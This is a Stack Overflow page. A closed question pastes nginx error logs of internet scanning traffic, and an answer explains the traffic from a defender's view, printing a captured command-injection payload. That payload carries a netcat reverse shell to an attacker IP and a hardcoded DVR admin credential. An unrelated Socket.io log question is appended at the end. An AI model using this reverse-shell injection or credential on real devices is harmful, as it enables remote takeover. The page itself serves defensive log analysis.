Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed 3 years ago.
Improve this question
Here is portion of nginx eror log on ubuntu 18.04. There is a constant http request to my nodejs server. My question is that is the server under attack? By looking online, 52.69.23.0/255.255.255.0 is a block from Tokyo, Japan.
2019/10/02 02:50:03 [error] 869#0: *415 directory index of "/ebs/www/" is forbidden, client: 221.126.40.214, server: 52.69.23.227, request: "HEAD / HTTP/1.1", host: "hongkong.me", referrer: "http://hongkong.me"
2019/10/02 03:02:42 [error] 869#0: *416 directory index of "/ebs/www/" is forbidden, client: 71.6.232.4, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *418 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *419 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *420 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:52 [error] 869#0: *421 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *422 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *423 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *424 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *425 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 106.13.99.19, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 05:29:54 [error] 869#0: *426 directory index of "/ebs/www/" is forbidden, client: 106.13.99.19, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 06:06:25 [error] 869#0: *427 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 06:08:39 [error] 869#0: *429 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *430 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *431 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *432 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *433 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:40 [error] 869#0: *434 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *435 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *436 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.232.15.163, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 06:08:41 [error] 869#0: *437 directory index of "/ebs/www/" is forbidden, client: 132.232.15.163, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
[ E 2019-10-02 06:17:55.8878 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/02 06:51:06 [error] 869#0: *438 directory index of "/ebs/www/" is forbidden, client: 167.114.227.178, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 09:56:10 [error] 869#0: *440 directory index of "/ebs/www/" is forbidden, client: 62.98.60.237, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:15:18 [error] 869#0: *442 directory index of "/ebs/www/" is forbidden, client: 182.149.116.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 11:41:21 [error] 869#0: *443 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 11:43:43 [error] 869#0: *444 directory index of "/ebs/www/" is forbidden, client: 150.107.206.166, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 13:16:08 [error] 869#0: *445 directory index of "/ebs/www/" is forbidden, client: 77.75.90.220, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 13:28:43 [error] 869#0: *446 directory index of "/ebs/www/" is forbidden, client: 219.92.248.187, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 15:38:08 [error] 869#0: *449 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *450 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *451 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *452 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:08 [error] 869#0: *453 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *454 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *455 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:09 [error] 869#0: *456 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 129.28.192.228, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/02 15:38:11 [error] 869#0: *457 directory index of "/ebs/www/" is forbidden, client: 129.28.192.228, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 15:55:41 [error] 869#0: *458 directory index of "/ebs/www/" is forbidden, client: 189.126.64.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:27:39 [error] 869#0: *459 directory index of "/ebs/www/" is forbidden, client: 72.44.25.17, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 16:50:44 [error] 869#0: *460 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 17:32:48 [error] 869#0: *461 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:10 [error] 869#0: *462 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:11 [error] 869#0: *463 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:33:56 [error] 869#0: *464 directory index of "/ebs/www/" is forbidden, client: 151.70.192.60, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 17:48:33 [error] 869#0: *465 directory index of "/ebs/www/" is forbidden, client: 110.34.3.142, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 19:37:18 [error] 869#0: *467 directory index of "/ebs/www/" is forbidden, client: 80.132.43.129, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 19:54:15 [error] 869#0: *468 directory index of "/ebs/www/" is forbidden, client: 52.206.7.27, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 19:59:40 [error] 869#0: *469 directory index of "/ebs/www/" is forbidden, client: 128.14.134.170, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 20:30:02 [error] 869#0: *470 directory index of "/ebs/www/" is forbidden, client: 209.17.96.194, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:02:49 [error] 869#0: *472 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/02 21:08:55 [error] 869#0: *474 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/02 21:08:55 [error] 869#0: *475 directory index of "/ebs/www/" is forbidden, client: 46.217.157.121, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 21:11:19 [error] 869#0: *476 open() "/ebs/www/wp-login.php" failed (2: No such file or directory), client: 120.26.95.190, server: 52.69.23.227, request: "GET /wp-login.php HTTP/1.1", host: "ec2-54-64-226-99.ap-northeast-1.compute.amazonaws.com"
2019/10/02 21:30:34 [error] 869#0: *477 directory index of "/ebs/www/" is forbidden, client: 62.109.0.97, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/02 22:02:26 [error] 869#0: *478 directory index of "/ebs/www/" is forbidden, client: 88.132.136.65, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/02 23:51:33 [error] 869#0: *479 directory index of "/ebs/www/" is forbidden, client: 183.129.160.229, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:32:25 [error] 869#0: *480 directory index of "/ebs/www/" is forbidden, client: 200.161.234.246, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 01:56:03 [error] 869#0: *481 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 02:43:38 [error] 869#0: *483 directory index of "/ebs/www/" is forbidden, client: 47.34.25.82, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 03:03:44 [error] 869#0: *484 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:24:46 [error] 869#0: *485 directory index of "/ebs/www/" is forbidden, client: 89.37.100.98, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 03:31:23 [error] 869#0: *486 directory index of "/ebs/www/" is forbidden, client: 120.220.28.152, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 05:25:46 [error] 869#0: *493 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 05:25:46 [error] 869#0: *494 directory index of "/ebs/www/" is forbidden, client: 162.62.17.159, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 06:15:59 [error] 869#0: *497 directory index of "/ebs/www/" is forbidden, client: 93.157.241.194, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
[ E 2019-10-03 06:17:55.9323 846/Tc age/Cor/SecurityUpdateChecker.h:362 ]: Security update check failed: File not readable: /home/ubuntu/.rvm/gems/ruby-2.3.3/gems/passenger-5.1.12/resources/update_check_client_cert.pem (next check in 24 hours)
2019/10/03 06:26:39 [error] 869#0: *499 directory index of "/ebs/www/" is forbidden, client: 185.113.238.146, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 06:38:29 [error] 869#0: *500 directory index of "/ebs/www/" is forbidden, client: 187.85.133.141, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:12:41 [error] 869#0: *502 directory index of "/ebs/www/" is forbidden, client: 14.184.219.103, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:17:46 [error] 869#0: *503 directory index of "/ebs/www/" is forbidden, client: 103.230.241.39, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 07:26:52 [error] 869#0: *504 directory index of "/ebs/www/" is forbidden, client: 185.238.237.117, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 07:33:36 [error] 869#0: *505 directory index of "/ebs/www/" is forbidden, client: 80.82.70.118, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 07:53:00 [error] 869#0: *508 directory index of "/ebs/www/" is forbidden, client: 60.191.52.254, server: 52.69.23.227, request: "HEAD http://112.124.42.80:63435/ HTTP/1.1", host: "112.124.42.80:63435"
2019/10/03 08:06:29 [error] 869#0: *510 directory index of "/ebs/www/" is forbidden, client: 60.208.210.67, server: 52.69.23.227, request: "HEAD http://123.125.114.144/ HTTP/1.1", host: "123.125.114.144"
2019/10/03 08:06:44 [error] 869#0: *511 directory index of "/ebs/www/" is forbidden, client: 46.170.207.14, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 09:04:28 [error] 869#0: *512 directory index of "/ebs/www/" is forbidden, client: 181.168.206.29, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 09:44:08 [error] 869#0: *513 directory index of "/ebs/www/" is forbidden, client: 178.212.49.134, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 10:55:19 [error] 869#0: *514 directory index of "/ebs/www/" is forbidden, client: 222.142.157.79, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 12:32:56 [error] 869#0: *516 directory index of "/ebs/www/" is forbidden, client: 81.213.111.207, server: 52.69.23.227, request: "GET / HTTP/1.0", host: "my_server_ip"
2019/10/03 13:23:45 [error] 869#0: *518 open() "/ebs/www/editBlackAndWhiteList" failed (2: No such file or directory), client: 93.174.93.178, server: 52.69.23.227, request: "POST /editBlackAndWhiteList HTTP/1.1", host: "my_server_ip"
2019/10/03 13:37:13 [error] 869#0: *519 directory index of "/ebs/www/" is forbidden, client: 143.202.226.42, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 13:50:41 [error] 869#0: *520 directory index of "/ebs/www/" is forbidden, client: 84.228.31.42, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:07:19 [error] 869#0: *521 directory index of "/ebs/www/" is forbidden, client: 66.252.220.245, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 14:36:17 [error] 869#0: *522 directory index of "/ebs/www/" is forbidden, client: 118.45.169.144, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 14:47:49 [error] 869#0: *523 directory index of "/ebs/www/" is forbidden, client: 103.113.104.144, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:05:25 [error] 869#0: *525 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *526 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *527 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *528 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *529 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:25 [error] 869#0: *530 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *531 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:26 [error] 869#0: *532 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 222.186.130.20, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 15:05:28 [error] 869#0: *533 directory index of "/ebs/www/" is forbidden, client: 222.186.130.20, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 15:14:25 [error] 869#0: *534 directory index of "/ebs/www/" is forbidden, client: 35.205.71.151, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 16:11:51 [error] 869#0: *535 directory index of "/ebs/www/" is forbidden, client: 175.158.139.94, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:33:33 [error] 869#0: *537 open() "/ebs/www/TP/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *538 open() "/ebs/www/TP/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *539 open() "/ebs/www/thinkphp/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /thinkphp/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:34 [error] 869#0: *540 open() "/ebs/www/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *541 open() "/ebs/www/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:35 [error] 869#0: *542 open() "/ebs/www/TP/html/public/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /TP/html/public/index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *543 open() "/ebs/www/elrekt.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /elrekt.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *544 open() "/ebs/www/index.php" failed (2: No such file or directory), client: 132.145.207.123, server: 52.69.23.227, request: "GET /index.php HTTP/1.1", host: "my_server_ip"
2019/10/03 16:33:36 [error] 869#0: *545 directory index of "/ebs/www/" is forbidden, client: 132.145.207.123, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 16:46:53 [error] 869#0: *546 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 46.253.39.142, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 16:47:04 [error] 869#0: *547 open() "/ebs/www/adminer.php" failed (2: No such file or directory), client: 176.104.107.105, server: 52.69.23.227, request: "GET /adminer.php HTTP/1.1", host: "my_server_ip", referrer: "http://my_server_ip/adminer.php"
2019/10/03 17:11:10 [error] 869#0: *548 directory index of "/ebs/www/" is forbidden, client: 45.161.103.201, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:12:28 [error] 869#0: *549 directory index of "/ebs/www/" is forbidden, client: 181.115.249.173, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
2019/10/03 19:54:54 [error] 869#0: *550 directory index of "/ebs/www/" is forbidden, client: 77.247.108.162, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 20:47:59 [error] 869#0: *552 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:48:31 [error] 869#0: *553 directory index of "/ebs/www/" is forbidden, client: 138.59.187.50, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 20:58:00 [error] 869#0: *554 directory index of "/ebs/www/" is forbidden, client: 89.248.169.12, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:34:49 [error] 869#0: *555 directory index of "/ebs/www/" is forbidden, client: 92.63.192.239, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip"
2019/10/03 22:50:36 [error] 869#0: *556 directory index of "/ebs/www/" is forbidden, client: 59.5.187.231, server: 52.69.23.227, request: "GET / HTTP/1.0"
2019/10/03 22:52:45 [error] 869#0: *557 directory index of "/ebs/www/" is forbidden, client: 36.82.101.191, server: 52.69.23.227, request: "GET / HTTP/1.1", host: "my_server_ip:80"
Any server connected to the public internet will be under attack on some level, even if it is not vulnerable. Internet-wide vulnerability scanning will find its way to you. The traffic indicates PHP scans and some other interesting traffic which has recently shown up on my IPS:
The host 93.174.93[.]178 sent HTTP POST request to destination URL "editBlackAndWhiteList" with Base64 encoded credentials:
admin:{12213BD1-69C7-4862-843D-260500D1DA40}
XML Payload:
refuse allow ip iprange mac true refuse true ip $(nc${IFS}93.174.93.178${IFS}31337${IFS}-e${IFS}$SHELL&)
IFS stands for "internal field separator". It is used by the shell to determine how to do word splitting.
The default value for IFS consists of whitespace characters (space, tab, and newline). $IFS or ${IFS}, are often used in command injection to replace white space. For many command-line interpreters, shells of Unix operating systems, the internal field separator is a variable that defines the characters used to separate a pattern into tokens for some operations.
$(nc 93.174.93[.]178 31337 -e $SHELL&) – Netcat Reverse Shell to host 93.174.93[.]178 on port 31337.
Fortinet has an IPS signature for this traffic, “HTTP.Unix.Shell.IFS.Remote.Code.Execution.” It indicates the detection of suspicious HTTP requests that use internal field separators.
https://fortiguard.com/encyclopedia/ips/45677/http-unix-shell-ifs-remote-code-execution
Snort IPS flags this traffic under the signature,” ET POLICY Incoming Basic Auth Base64 HTTP Password detected unencrypted.”
The host is attempting to exploit a Remote Code Execution vulnerability in Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API via a hardcoded 'admin' web GUI password to get a reverse shell. Six POC’s are available on GitHub: https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt
It would be wise to setup an IPS in front of your web server.
I build and chatroom app with the Socket.io,
but after deploying to the production server, there are lots of error in Nginx's log:
2016/08/07 09:15:05 [error] 14069#14069: *7875548 upstream prematurely closed connection while reading response header from upstream, client: 171.4.246.202, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=EIuZoogwZQLJRqqVAMDl&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10001/socket.io/?EIO=3&sid=EIuZoogwZQLJRqqVAMDl&transport=websocket", host: "chat.geek4it.com"
2016/08/07 09:15:05 [error] 14069#14069: *7875548 upstream prematurely closed connection while reading response header from upstream, client: 171.4.246.202, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=EIuZoogwZQLJRqqVAMDl&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10007/socket.io/?EIO=3&sid=EIuZoogwZQLJRqqVAMDl&transport=websocket", host: "chat.geek4it.com"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10007/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10003/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10002/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10001/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10006/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10008/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10005/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:25 [error] 14070#14070: *7877071 upstream prematurely closed connection while reading response header from upstream, client: 223.24.40.131, server: chat.geek4it.com, request: "GET /socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF HTTP/1.1", upstream: "http://172.30.31.1:10004/socket.io/?transport=websocket&sid=Vc0WK_sK5E2OW_BKAJXF", host: "chat.geek4it.com:80"
2016/08/07 09:15:29 [error] 14069#14069: *7877292 upstream prematurely closed connection while reading response header from upstream, client: 125.25.177.189, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10008/socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket", host: "chat.geek4it.com"
2016/08/07 09:15:29 [error] 14069#14069: *7877292 upstream prematurely closed connection while reading response header from upstream, client: 125.25.177.189, server: chat.geek4it.com, request: "GET /socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket HTTP/1.1", upstream: "http://172.30.31.1:10002/socket.io/?EIO=3&sid=QPdEtaKYseDpI2HkAJrB&transport=websocket", host: "chat.geek4it.com"
